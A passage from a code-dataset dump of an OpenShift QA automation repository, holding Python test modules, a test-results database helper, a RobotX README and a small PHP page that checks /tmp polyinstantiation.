1 weeks\n\n* Tutorial & Training\n ...\n\n" }, { "alpha_fraction": 0.5932294726371765, "alphanum_fraction": 0.5996776223182678, "avg_line_length": 32.23214340209961, "blob_id": "53da125f20724cdce46727cbdb4a11d7afb1c9d3", "content_id": "8cf81ea5d6b5315e6b0295b655df9fb1b0205d1c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1861, "license_type": "no_license", "max_line_length": 154, "num_lines": 56, "path": "/automation/open/testmodules/RT/hot_deploy/nodejs_without_jenkins.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n\n\"\"\"\nAttila Nagy\nNov 13, 2012\n\"\"\"\n\nimport rhtest\nimport common\nimport fileinput\nimport re\nfrom hot_deploy_test import HotDeployTest\n\nclass NodeJSHotDeployWithoutJenkins(HotDeployTest):\n \n def __init__(self, config):\n rhtest.Test.__init__(self, config)\n self.config.application_name = common.getRandomString()\n self.config.application_type = common.app_types['nodejs']\n self.config.scalable = False\n self.config.jenkins_is_needed = False\n self.config.summary = \"[US2747][RT]Hot deployment support for application - without Jenkins - nodejs-0.6\"\n \n def configuration(self):\n self.log_info(\"Modifying the application to check PID\")\n self.config.file_name = \"pid.js\"\n self.info(\"Editing file '%s'...\" % 'server.js')\n try:\n for line in fileinput.input(\"./%s/server.js\" % ( self.config.application_name ), inplace = True):\n print line,\n if re.search(r'// Routes for /health, /asciimo and /', line):\n print \n print \"\\t\\tself.routes['/pid.js'] = function(req, res) {\"\n print \"\\t\\t\\tres.send(fs.readFileSync(process.env.OPENSHIFT_HOMEDIR + '/%s/run/node.pid').toString());\" % self.config.application_type\n print \"\\t\\t};\"\n print\n except Exception as e:\n fileinput.close()\n print type(e)\n print e.args\n self.fail(\"Configuration of the test-application must be successful\")\n finally:\n fileinput.close()\n self.deploy()\n \nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(NodeJSHotDeployWithoutJenkins)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n" }, { "alpha_fraction": 0.5740814208984375, "alphanum_fraction": 0.5846550464630127, "avg_line_length": 30.13580322265625, "blob_id": "b61ea449f5844e2821319f1c27f402130fb553b9", "content_id": "cb0f20712fe39f7b0c2833f09f3a5315525712f7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 15132, "license_type": "no_license", "max_line_length": 225, "num_lines": 486, "path": "/automation/open/lib/database.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n\"\"\"\ndatabase support library\n\n\"\"\"\n\nfrom sqlobject import *\nfrom sqlobject.sqlbuilder import Select, func\nimport json\nimport time\nimport datetime\nglobal sqlhub\nlogdb = 'localhost'\n#logdb = 'ec2-50-17-200-67.compute-1.amazonaws.com'\n\n__all__ = ['TestResults', 'LibraAmis', 'PerfManifest', 'PerfResults',\n \n # Misc classes/functions.\n 'connect2db', 'disconnect',\n ]\nBUILD_DBURI=\"mysql://ruser:lab@%s/reports\" % logdb\n#DBURI=\"mysql://ruser:lab@%s/Openshift\" % \"localhost\" \nDBURI=\"mysql://ruser:lab@%s/Openshift\" % \"10.14.16.138\" \n\nTEST_RUN_STATUS = {'RUNNING' : 0, 'FINISHED' : 1}\nCASE_RUN_STATUS = {'IDLE':1,'PASSED':2,'FAILED':3, 'RUNNING':4, 'PAUSED':5, \n 'BLOCKED':6,'ERROR':7, 'WAIVED':8}\n\ndef 
connect2db(uri=DBURI):\n global sqlhub\n if not hasattr(sqlhub, \"processConnection\"):\n connection = connectionForURI(uri)\n sqlhub.processConnection = connection\n return sqlhub.processConnection\n\ndef disconnect():\n global sqlhub\n if hasattr(sqlhub, \"processConnection\"):\n conn = sqlhub.processConnection\n del sqlhub.processConnection\n\nclass TestResults(SQLObject):\n AmiID = StringCol() # AMI that the instance is based on. \n TestName = StringCol() # Name of the test that was run AMI that the instance is based on.\n StartTime = DateTimeCol() # The date and time that the test was started. \n EndTime = DateTimeCol() # The date and time that the test was completed. This is the time that the script wrote a P/F/I result into this record.\n TestbedID = StringCol() # the ip of the instance \n TestScript = StringCol() # need this?? \n #ConfigFile = StringCol() # A file pointer to the test configuration file that was used during the test.\n ResultsDataFile = StringCol() # File pointer. If a lengthy report or text file of data is produced during the test iterations, the results from all iterations are stored in a single file. NULL if none.\n User = StringCol() # Name of the user that ran the test\n Comments = StringCol() # User comments about the test\n PassFail = EnumCol(enumValues=[\"P\", \"F\", \"I\",\"A\"]) # The test PASS/FAIL result. P=PASS, F=FAIL, I=INCOMPLETE\n BuildVersion = StringCol() # DSP sw version\n RunMode = StringCol()\n TcmsTag = StringCol()\n TcmsTestCaseId = IntCol()\n TcmsTestCaseRunId = IntCol()\n TcmsTestRunId = IntCol()\n\nclass LibraAmis(SQLObject):\n ami_id = StringCol()\n #provider = ('Provider') # \n build_version = StringCol() # ami ID\n ami_time = DateTimeCol() # when the ami was created. \n\nclass PerfManifest(SQLObject):\n action = StringCol()\n cartridge = StringCol()\n\nclass PerfResults(SQLObject):\n TestResultsID = IntCol() #ForeignKey(\"TestResults\")\n ActionID = IntCol() #ForeignKey(\"PerfManifest\")\n ActionTime = FloatCol() # seconds the action took\n GearSize = IntCol()\n\nclass TcmsTags(SQLObject):\n plan_id = IntCol()\n tcms_id = IntCol()\n name = StringCol()\n tc_count = IntCol()\n tag_json = BLOBCol()\n\nclass TcmsTestcases(SQLObject):\n plan_id = IntCol()\n case_id = IntCol()\n case_json = BLOBCol() # dict is reprsented as JSON \n\nclass TcmsTestRun(SQLObject):\n plan = IntCol()\n #errata_id = IntCol()\n manager = IntCol()\n summary = StringCol()\n product = IntCol()\n product_version = IntCol()\n default_tester = IntCol()\n plan_text_version = IntCol()\n estimated_time = StringCol()\n notes = StringCol()\n status = IntCol()\n case_list = StringCol()\n tag_list = StringCol()\n migrated = IntCol() # default to 0, migrated = 1 if user migrated the result back into tcms after tcms server is back online\n launched_time = DateTimeCol()\n\nclass TcmsTestcaseRun(SQLObject):\n run = IntCol()\n case_id = IntCol()\n build = IntCol()\n assignee = IntCol()\n case_run_status = IntCol()\n case_text_version = IntCol()\n notes = StringCol()\n sortkey = IntCol()\n migrated = IntCol() # default to 0, migrated = 1 if user migrated the result back into tcms after tcms server is back online\n\n\n\n\n\nclass ConfigDefaults(SQLObject):\n name = StringCol()\n value = StringCol()\n\n###### helper function\n\ndef ami_in_db(ami_id):\n \"\"\"\n return true if the ami_id exists in table already, false otherwise.\n\n \"\"\"\n connect2db()\n tbl = LibraAmis\n sql = tbl.select(tbl.q.ami_id==ami_id)\n res = list(sql)\n if len(res) > 0:\n return True\n else:\n return 
False\n\ndef get_ami_info(ami_id):\n connect2db()\n tbl = LibraAmis\n sql = tbl.select(tbl.q.ami_id==ami_id)\n res = list(sql)\n if len(res) > 0:\n return res[0]\n else:\n return None\n\ndef get_stg_ami(pattern='devenv-stage_'):\n connect2db()\n tbl = LibraAmis\n sql = tbl.select(tbl.q.build_version.startswith(pattern)).orderBy('ami_time').reversed()\n res = list(sql)[0]\n return res\n\"\"\"\ndef get_perf_action_id(action):\n connect2db()\n tbl = PerfManifest\n sql = tbl.select(tbl.q.action==action)\n res = list(sql)\n if (len(res) == 0):\n # nothing found, insert it\n res = PerfManifest(action=action)\n return res[0]\n else:\n return res[0]\n\"\"\"\ndef get_perf_action_id(action, cartridge=None):\n connect2db()\n tbl = PerfManifest\n sql = tbl.select(AND(tbl.q.action==action, tbl.q.cartridge==cartridge))\n res = list(sql)\n if (len(res) == 0):\n res = PerfManifest(action=action, cartridge=cartridge)\n print #################\n return res.id\n else:\n return res[0].id\n \ndef record_results(resid, res_dict):\n #self.info(\"xx\", 1)\n for k, v in res_dict.items():\n # first check to see if the performance action exists\n action = get_perf_action_id(k)\n res = PerfResults(TestResultsID=resid, ActionID=action.id, \n ActionTime=v[0], GearSize=v[1])\n print res.id\n\ndef get_defaults():\n connect2db()\n tbl = ConfigDefaults\n sql = tbl.select()\n res_list = list(sql)\n configs = {}\n for res in res_list:\n configs[res.name] = res.value\n\n return configs\n\ndef populate_tcms_testcases_by_tag(tcms_obj, tag):\n \"\"\" \n save the json tag into mysql \n\n \"\"\"\n connect2db()\n tbl = TcmsTags\n test_plan_id = tcms_obj.plan_id\n testcase_json, tc_count = tcms_obj.dump_testcases_to_json_by_tag(tag['name'])\n # check to see if that exists in DB, insert it if not\n sql = tbl.select(AND(tbl.q.name==tag['name'], tbl.q.tcms_id==tag['id']))\n res = list(sql)\n if len(res):\n # exist already just update the json field and count\n res[0].tag_json = testcase_json\n res[0].tc_count = tc_count \n else:\n print \"Row does not exist...adding...\"\n TcmsTags(\n plan_id=test_plan_id,\n tcms_id=tag['id'],\n name = tag['name'],\n tc_count = tc_count,\n tag_json = testcase_json\n )\n \ndef populate_tcms_testcases(testcase_dict, plan_id=4962):\n connect2db()\n tbl = TcmsTestcases\n testcase_json = json.dumps(testcase_dict)\n sql = tbl.select(tbl.q.case_id == testcase_dict['case_id'])\n res = list(sql)\n if len(res):\n res[0].case_json = testcase_json\n else:\n res = tbl(plan_id=plan_id,\n case_id=testcase_dict['case_id'],\n case_json = testcase_json)\n return res\n \n \ndef get_testcases_json_by_tag(tag_name):\n \"\"\"\n return the testcases represented in JSON given a tag_name\n \"\"\"\n connect2db()\n tbl = TcmsTags\n sql = tbl.select(tbl.q.name==tag_name)\n res = list(sql)\n if len(res):\n return res[0].tag_json\n else:\n print \"No information found in mysql for tag '%s'\" % tag_name\n return None\n\ndef extract_testcase_ids_from_json(json_data, params=None):\n \"\"\" given a json formated testcase data, extract all of the testcase ids\n user can filter out cases by providing the params with parameters to filter\n params = {'is_automated': 1, 'case_status' : 'CONFIRMED'}\n \"\"\"\n testcase_data = json.loads(json_data)\n tc_id_list = []\n for testcase in testcase_data:\n if params:\n match = 1\n for param in params.items():\n if testcase[param[0]] != param[1]:\n match = 0\n break\n if match:\n tc_id_list.append(testcase['case_id'])\n else:\n tc_id_list.append(testcase['case_id'])\n return tc_id_list\n\ndef 
get_testcase_ids_by_tag(tag_names, params=None):\n \"\"\" params contains parameters user wish to return testcase to be filtered\n by: for example... params = {'is_automated': 1, 'case_status' : 'CONFIRMED'}\n will only return testscases that are marked automated and confirmed \n \"\"\"\n tc_list = []\n for tag_name in tag_names:\n json_data = get_testcases_json_by_tag(tag_name)\n tc_list = tc_list + extract_testcase_ids_from_json(json_data, params)\n return tc_list\n\ndef get_testcase_by_id(case_id):\n \n connect2db()\n tbl = TcmsTestcases\n sql = tbl.select(tbl.q.case_id == case_id)\n res = list(sql)\n if len(res):\n tc_dict = json.loads(res[0].case_json)\n \n return tc_dict\n else:\n print \"No testcase id '%s' found in database\" % case_id\n return None\n \ndef get_all_tcms_testcases():\n connect2db()\n testcases = []\n tbl = TcmsTestcases\n sql = tbl.select()\n results = list(sql)\n for res in results:\n test = {}\n\n details = json.loads(res.case_json)\n test['id'] = res.id\n test['details'] = details\n testcases.append(test)\n return testcases\n\ndef get_testcase_run_id_from_db(test_run_id, tcms_testcase_id):\n \"\"\"\n given a test_run id and tcms_testcase_id, return the testcase_run id in db\n \"\"\"\n connect2db()\n tbl = TcmsTestcaseRun\n sql = tbl.select(AND(tbl.q.case_id==tcms_testcase_id, tbl.q.run==test_run_id))\n results = list(sql)\n if results:\n return results[0].id\n else:\n return None\n\n\ndef create_tcms_testrun(params = None):\n \"\"\"\n create an new entry into the mysql database for a testrun that will eventually\n store back into TCMS once the server is back-online\n \"\"\"\n connect2db()\n tbl = TcmsTestRun\n launched_time = datetime.datetime.fromtimestamp(time.time())\n default_params= {\n 'plan' : 4962,\n 'manager' : 2351,\n\n 'summary' : 'Automated summary',\n 'product' : 292,\n 'product_version' : 1212,\n 'default_tester' : 2955,\n 'plan_text_version' : 1,\n 'estimated_time' : '00:00:00',\n 'notes' : 'automated notes',\n 'status' : 0, \n 'case_list' : None,\n 'tag_list' : None,\n 'migrated' : 0,\n 'launched_time': launched_time,\n }\n\n if params is None:\n params = default_params\n\n else:\n for k, v in params.items():\n default_params[k] = params[k]\n\n params = default_params\n\n res = tbl(\n plan = params['plan'],\n manager = params['manager'],\n summary = params['summary'],\n product = params['product'],\n product_version = params['product_version'],\n default_tester = params['default_tester'],\n plan_text_version = params['plan_text_version'],\n estimated_time = params['estimated_time'],\n notes = params['notes'],\n status = params['status'],\n case_list = params['case_list'],\n tag_list = params['tag_list'],\n migrated = params['migrated'],\n launched_time=params['launched_time'],\n )\n \n return res\n\ndef update_testrun(testrun_id, params):\n tbl = connect2db()\n tbl = TcmsTestRun\n res = tbl.select(tbl.q.id == testrun_id)\n if res:\n for k, v in params.items():\n res[0].__setattr__(k, v)\n\n \n return res\n\ndef create_tcms_testcase_run(params = None):\n \"\"\"\n create an new entry into the mysql database for a testrun that will eventually\n store back into TCMS once the server is back-online\n \"\"\"\n connect2db()\n tbl = TcmsTestcaseRun\n default_params= {\n 'assignee' : 2351,\n 'case_run_status' : 1, # IDLE\n 'case_text_version' : 1,\n 'notes' : 'TBD',\n 'sortkey': 0,\n 'migrated' : 0,\n 'build': 1770,\n }\n\n if params is None:\n params = default_params\n\n else:\n for k, v in params.items():\n default_params[k] = params[k]\n\n params = 
default_params\n\n res = tbl(\n run = params['run'],\n case_id = params['case_id'],\n build = params['build'],\n assignee = params['assignee'],\n case_run_status = params['case_run_status'],\n case_text_version = params['case_text_version'],\n notes = params['notes'],\n sortkey = params['sortkey'],\n migrated = params['migrated'])\n \n return res\n\ndef update_testcase_run(testcase_run_id, params):\n tbl = connect2db()\n tbl = TcmsTestcaseRun\n res = tbl.select(tbl.q.id == testcase_run_id)\n if res:\n for k, v in params.items():\n res[0].__setattr__(k, v)\n return res\n\ndef update_testcaserun_status(test_run_id, tcms_testcase_id, status):\n run_status = CASE_RUN_STATUS[status]\n params = {'case_run_status': run_status}\n db_testcase_run_id = get_testcase_run_id_from_db(test_run_id, tcms_testcase_id)\n res = update_testcase_run(db_testcase_run_id, params)\n return res\n\ndef get_latest_test_result():\n tbl = connect2db()\n tbl = TestResults\n id_count = tbl.select().reversed().count()\n res = tbl.select(tbl.q.id==id_count)[0]\n return res\n\n\ndef _test():\n cart_types = ['php-5.3', 'ruby-1.8']\n domain_action = ['domain_create', 'domain_', 'domain_delete']\n app_action = ['app_start', 'app_stop', 'app_reload', 'app_restart']\n \n for cart in cart_types:\n for action in app_action:\n id = get_perf_action_id(action, cart)\n print \"ID: %s\" % id\n \nif __name__ == '__main__':\n #_test()\n\n #val = get_defaults()\n #val = get_stg_ami()\n ##res_dict = {'create_domain': 4.3, 'delete_domain': 3.1}\n #res = get_testcase_by_id(122349)\n #update_tcms_testrun(18, {'status': 0})\n #res = create_tcms_testcase_run({'run': 3, 'case_id': 122349})\n #res = create_tcms_testrun({'notes': \"This is a test\"})\n ##record_results(50, res_dict)\n #res = get_testcases_json_by_tag('origin')\n #params = {'is_automated': 1, 'case_status': 'CONFIRMED'}\n #res = get_testcase_ids_by_tag([\"origin\"], params=params)\n #get_testcase_run_id_from_db(21, 122166)\n get_test_result_status()\n self.info(\"xxx\", 1)\n pass\n" }, { "alpha_fraction": 0.5990903377532959, "alphanum_fraction": 0.6231319308280945, "avg_line_length": 23.80645179748535, "blob_id": "29a503dfb1d252ab24a22fba6a86e006d9acb2ea", "content_id": "56dae7611fcc9c80cba12c098af4723cd1fce906", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1539, "license_type": "no_license", "max_line_length": 86, "num_lines": 62, "path": "/automation/open/testmodules/UI/web/case_135712.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# coding=utf-8\n#\n# File name: case_135712.py\n# Date: 2012/07/24 10:56\n# Author: [email protected] \n#\n\nimport rhtest\nimport time\n\nclass OpenShiftTest(rhtest.Test):\n def initialize(self):\n pass\n\n def finalize(self):\n pass\n\n\nclass Change_password_invalid(OpenShiftTest):\n def test_method(self):\n web = self.config.web\n web.login()\n \n #Change password using invalid new password\n web.go_to_account() \n web.click_element_by_xpath('''//section/div/div/a''')\n time.sleep(5)\n web.input_by_id('web_user_old_password',web.config.OPENSHIFT_user_passwd)\n web.input_by_id('web_user_password','ss')\n web.input_by_id('web_user_password_confirmation','ss')\n web.click_element_by_xpath('''//form[@id='new_web_user']/fieldset[2]/input''')\n time.sleep(5)\n web.assert_text_equal_by_xpath('''Passwords must be at least 6 characters''',\n '''//div[@id='web_user_password_input']/div/p''') \n\n self.tearDown()\n\n return self.passed(\"Case 135712 
test passed.\")\n\n\n def tearDown(self):\n self.config.web.driver.quit()\n self.assert_equal([], self.config.web.verificationErrors)\n\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(Change_password_invalid)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n\n#\n# end of case_135712.py \n#\n# vim: set tabstop=4:shiftwidth=4:expandtab: \n" }, { "alpha_fraction": 0.6829954981803894, "alphanum_fraction": 0.6829954981803894, "avg_line_length": 23.328767776489258, "blob_id": "0abef7611d02d3f763c24527879d418d9e2d0d27", "content_id": "be8a57ebf8f29b4e395e65d906d7df98ea46df1a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 1776, "license_type": "no_license", "max_line_length": 204, "num_lines": 73, "path": "/README.rst", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "RobotX\n======\n\nInstructions\n------------\n\nThe RobotX is a tool set for automation development with `Robot Framework`_.\n\nIt includes the following tools:\n\n- Runner\n- Generator\n- Debugger\n- Checker\n- Expander\n\nInstallation\n------------\n\n.. code:: bash\n\n $ pip install robotx\n or\n $ easy_install robotx\n\n\nUsage\n-----\n\n`RobotX Usage Doc`_\n\nBuild & Config Jenkins\n----------------------\n\n`Build Config Jenkins`_\n\n\nRobot Framework Best Practices\n------------------------------\n\n`Robot Framework Best Practice`_\n\nTest Case Management System\n---------------------------\n\nDefault TCMS Client \n~~~~~~~~~~~~~~~~~~~\n\nCurrently, RobotX uses `Nitrate`_ as default TCMS(Test Case Management System). If your TCMS is not Nitrate(such as TestLink), you need write a new client and replace the `default TCMS client of RobotX`_.\n\nConfigure TCMS Client \n~~~~~~~~~~~~~~~~~~~~~\n\n- Copy `tcms config`_ to /etc/, and name it as tcms.conf.\n\n- Open tcms.conf, and change all values to yours.\n\nComing Soon\n-----------\n\n- Create Message Queue for improving the efficiency of RobotX communicate with TCMS.\n\n- Add the mechanism of parallel execution automated cases on multiple machine nodes at one time.\n\n\n\n.. _Robot Framework: http://robotframework.org/\n.. _RobotX Usage Doc: https://github.com/idumpling/robotx/blob/master/docs/USAGE.md\n.. _Build Config Jenkins: https://github.com/idumpling/robotx/blob/master/docs/JENKINS_CONFIG.md\n.. _Robot Framework Best Practice: https://github.com/idumpling/robotx/blob/master/docs/ROBOT_BEST_PRACTICE.md\n.. _Nitrate: https://fedorahosted.org/nitrate/\n.. _default TCMS client of RobotX: https://github.com/idumpling/robotx/blob/master/robotx/core/nitrateclient.py\n.. 
_tcms config: https://github.com/idumpling/robotx/blob/master/robotx/conf/tcms.conf\n" }, { "alpha_fraction": 0.614130437374115, "alphanum_fraction": 0.6206521987915039, "avg_line_length": 34.9296875, "blob_id": "a5fd9016f7f3557490818813f9c1838a7756211a", "content_id": "c2ebf15352028b1b1898331ce154a37680bbe689", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4600, "license_type": "no_license", "max_line_length": 130, "num_lines": 128, "path": "/automation/open/testmodules/RT/admin/move_app_between_nodes_within_district.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#\n# File name: move_app_between_nodes_within_district.py\n# Date: 2012/08/31 16:17\n# Author: [email protected]\n#\n\nimport common\nimport rhtest\nimport OSConf\nimport re\n\n\nclass OpenShiftTest(rhtest.Test):\n ITEST = [\"DEV\"]\n\n def initialize(self):\n self.info(\"[US2102] Move scalable application with postgresql embeded between nodes within one district\")\n try:\n self.test_variant = self.get_variant()\n except:\n self.test_variant = 'php'\n try:\n self.db_variant = self.config.tcms_arguments['db_variant']\n except:\n self.db_variant = 'postgresql'\n try:\n self.scalable = self.config.tcms_arguments['scalable']\n except:\n self.scalable = False\n\n self.info(\"VARIANT: %s\"%self.test_variant)\n self.info(\"DB VARIANT: %s\"%self.db_variant)\n self.info(\"SCALABLE: %s\"%self.scalable)\n self.user_email = self.config.OPENSHIFT_user_email\n self.user_passwd = self.config.OPENSHIFT_user_passwd\n self.app_name = common.getRandomString(10)\n self.app_type = common.app_types[self.test_variant]\n self.cart_type = common.cartridge_types[self.db_variant]\n self.district_name=common.getRandomString(10)\n self.district_created=False\n common.env_setup()\n\n\n def finalize(self):\n pass\n\n\nclass MoveAppBetweenNodesWithinDistrict(OpenShiftTest):\n def create_district(self):\n if self.district_created:\n return\n self.info(\"Create a district\")\n (ret, output) = common.create_district(self.district_name)\n self.assert_equal(ret, 0, \"Unable to create a district\")\n self.district_created=True\n\n def test_method(self):\n msetup = common.setup_multi_node_env(self.district_name)\n\n self.assert_true((len(msetup['nodes'])>=2), \"Missing multi node environment!\")\n self.info(\"Found %s connected nodes\"%len(msetup['nodes']))\n\n ret = common.set_max_gears(self.user_email, common.DEV_MAX_GEARS)\n #self.assert_equal(ret, 0, \"Unable set max_gears\")\n\n if self.scalable:\n ret = common.create_scalable_app(self.app_name, self.app_type, clone_repo=False)\n else:\n ret = common.create_app(self.app_name, self.app_type, clone_repo=False)\n self.assert_equal(ret, 0, \"Unable to create the app\")\n\n ret = common.embed(self.app_name, 'add-%s'%self.cart_type)\n self.assert_equal(ret, 0, \"Unable to embed the app by %s\"%self.db_variant)\n\n #app_uuid=OSConf.get_app_uuid(self.app_name)\n app_url=OSConf.get_app_url(self.app_name) #node\n (gear_groups, gear_count) = self.config.rest_api.get_gears(self.app_name)\n\n gear_to_move = None\n for gear_group in gear_groups:\n for cart in gear_group['cartridges']:\n if cart['name'].find('%s' % self.db_variant) != -1:\n gear_to_move = gear_group['gears'][0]['id']\n self.assert_true((gear_to_move is not None), \"Unable to find gear of %s\"%self.db_variant)\n self.info(\"Gear of %s\"%gear_to_move)\n district_of_moved_gear = common.get_district_of_gear(gear_to_move)\n node_of_moved_gear = 
common.get_node_of_gear(gear_to_move)\n self.assert_true((node_of_moved_gear is not None), \"Unable to find server_identity per gear[%s]\"%gear_to_move)\n self.info(\"Finding available nodes for possible move gear[%s] within district[%s]\"%(gear_to_move, district_of_moved_gear))\n node_to_move = None\n\n for n in common.get_nodes_of_district(district_of_moved_gear):\n if n == node_of_moved_gear:\n continue\n else:\n node_to_move = n\n break\n\n app_url_private_ip = common.get_private_ip(app_url)\n self.info(\"app[%s] -> node[%s]\"%(app_url,app_url_private_ip))\n self.info(\"Node to move: %s\"%node_to_move)\n if node_to_move:\n ret = common.move_gear_between_nodes(gear_to_move, node_to_move)\n self.assert_equal(ret, 0, \"Unable to move gear.\")\n else:\n return self.abort(\"Unable to find a free node to move in withing district[%s].\"%district_of_moved_gear)\n\n return self.passed(\"%s passed\" % self.__class__.__name__)\n\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(MoveAppBetweenNodesWithinDistrict)\n return suite\n\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n\n#\n# end of move_app_between_nodes_within_district.py \n#\n# vim: set tabstop=4:shiftwidth=4:expandtab: \n" }, { "alpha_fraction": 0.6354514956474304, "alphanum_fraction": 0.6421404480934143, "avg_line_length": 32.977272033691406, "blob_id": "d284df1918d4eabf647c8c5d28a268c032a7c046", "content_id": "ccd4dbf34c6d8f28af5d3c5d5a9deb7af6fa033c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1495, "license_type": "no_license", "max_line_length": 155, "num_lines": 44, "path": "/automation/open/testmodules/RT/hot_deploy/perl_without_jenkins.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n\n\"\"\"\nAttila Nagy\nSept 26, 2012\n\n\n\"\"\"\nimport rhtest\nimport common\nfrom hot_deploy_test import HotDeployTest\n\nclass PerlHotDeployWithoutJenkins(HotDeployTest):\n def __init__(self, config):\n rhtest.Test.__init__(self, config)\n self.config.application_name = common.getRandomString()\n self.config.application_type = common.app_types['perl']\n self.config.scalable = False\n self.config.jenkins_is_needed = False\n self.config.summary = \"[US2309] Hot deployment support for non-scaling Perl app - without Jenkins\"\n \n def configuration(self):\n self.log_info(\"Creating the application to check PID\")\n self.config.file_name = \"pid.pl\"\n self.info(\"Editing file '%s'...\" % self.config.file_name)\n perl_file = open(\"./%s/perl/%s\" % (self.config.application_name, self.config.file_name), \"w\")\n perl_file.write('#!/usr/bin/perl\\n')\n perl_file.write('print \"Content-type: text/plain\\\\r\\\\n\\\\r\\\\n\";\\n')\n perl_file.write('open FILE, \"<\" . $ENV{\"OPENSHIFT_HOMEDIR\"} . 
\"/%s/run/httpd.pid\" or die \"Cannot open the file\";\\n' % self.config.application_type)\n perl_file.write('while ( <FILE> ) { print };')\n perl_file.close()\n self.deploy()\n \nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(PerlHotDeployWithoutJenkins)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n" }, { "alpha_fraction": 0.5287356376647949, "alphanum_fraction": 0.5673981308937073, "avg_line_length": 24.864864349365234, "blob_id": "590fbf7eeecf570ece2b97f83d988a7725eaec4f", "content_id": "83e699741255527fd101f76a3262668fbaa82972", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "PHP", "length_bytes": 957, "license_type": "no_license", "max_line_length": 119, "num_lines": 37, "path": "/automation/open/testmodules/RT/security/data/polyinstantiation_tmp_dir_index.php", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "<?php\necho \"Welcome~~~~~~~\\n\";\necho \"###Test Case###: Security - Polyinstantiation of /tmp and /var/tmp for new application by using pam_namespace\\n\";\nif(!empty($_GET[\"action\"])) {\n $command1 = \"touch /tmp/php_tmp_test 2>&1\";\n echo \"Command 1: \".$command1.\"\\n\";\n passthru($command1, $ret1);\n\n $command2 = \"touch /var/tmp/php_var_tmp_test 2>&1\";\n echo \"Command 2: \".$command2.\"\\n\";\n passthru($command2, $ret2);\n\n $command = \"ls -l /tmp 2>&1\";\n echo \"Command: \".$command.\"\\n\";\n passthru($command, $ret_tmp);\n\n if($ret1 == 0 && $ret2 == 0){\n echo \"RESULT=0\\n\";\n } else {\n echo \"RESULT=1\\n\";\n }\n} else {\n $command1 = \"ls -l /tmp/php_tmp_test 2>&1 && ls -l /var/tmp/php_var_tmp_test 2>&1\";\n echo \"Command 1: \".$command1.\"\\n\";\n passthru($command1, $ret1); \n\n $command = \"ls -l /tmp/ 2>&1\";\n echo \"Command: \".$command.\"\\n\";\n passthru($command, $ret_tmp);\n\n if($ret1 == 0){\n echo \"RESULT=0\\n\";\n } else {\n echo \"RESULT=1\\n\";\n }\n}\n?>\n" }, { "alpha_fraction": 0.5179256200790405, "alphanum_fraction": 0.5233370661735535, "avg_line_length": 38.9549560546875, "blob_id": "78608a657d828ef13468c6c937645347680bcae8", "content_id": "115b0af5a6d09660c240d9d03e02ad994e10a135", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4435, "license_type": "no_license", "max_line_length": 165, "num_lines": 111, "path": "/automation/open/testmodules/RT/client/specify_conf_file.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\nimport os, sys\n\nimport common, OSConf\nimport rhtest\n\n\nPASSED = rhtest.PASSED\nFAILED = rhtest.FAILED\n\n\nclass OpenShiftTest(rhtest.Test):\n INTERACTIVE = False\n\n def initialize(self):\n self.user_email = self.config.OPENSHIFT_user_email\n self.user_passwd = self.config.OPENSHIFT_user_passwd\n self.domain_name = common.get_domain_name()\n self.test_rhlogin = \"[email protected]\"\n common.env_setup()\n self.conf_file_path = \"./my_express.conf\"\n self.ssh_key_path = \"%s/%s\" %(os.getcwd(), common.getRandomString(10))\n self.info(\"Add -c option to client tools to specify openshift configuration file\")\n\n def finalize(self):\n try:\n common.command_get_status(\"rm -f %s %s %s.pub\" %(self.conf_file_path, self.ssh_key_path, self.ssh_key_path))\n common.update_sshkey()\n except Exception as e:\n self.error(\"ERROR in finalize(): %s\"%str(e))\n\n\nclass SpecifyConfFile(OpenShiftTest):\n def test_method(self):\n self.add_step(\"Get the previous 
